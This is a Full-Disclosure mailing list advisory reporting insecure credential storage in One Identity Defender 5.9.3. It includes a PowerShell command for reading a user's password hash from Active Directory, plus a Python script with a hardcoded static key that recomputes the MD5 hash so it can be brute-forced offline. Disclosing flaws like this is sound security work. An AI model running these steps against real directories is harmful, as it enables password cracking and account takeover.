lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 01 Sep 2019 22:26:04 +0000
From: spicyitalian--- via Fulldisclosure <>
To: "" <>
Subject: [FD] One Identity Defender - Insecure Cryptographic Storage

Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName                    ObjectGUID                           defender-userTokenData
-----------------                    ----------                           ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
import binascii
import hashlib

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'

guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))

password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()

hash = binascii.unhexlify(key) + password + guid

print (hashlib.md5(hash).hexdigest())

[duras@...os ~]$ ./


Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists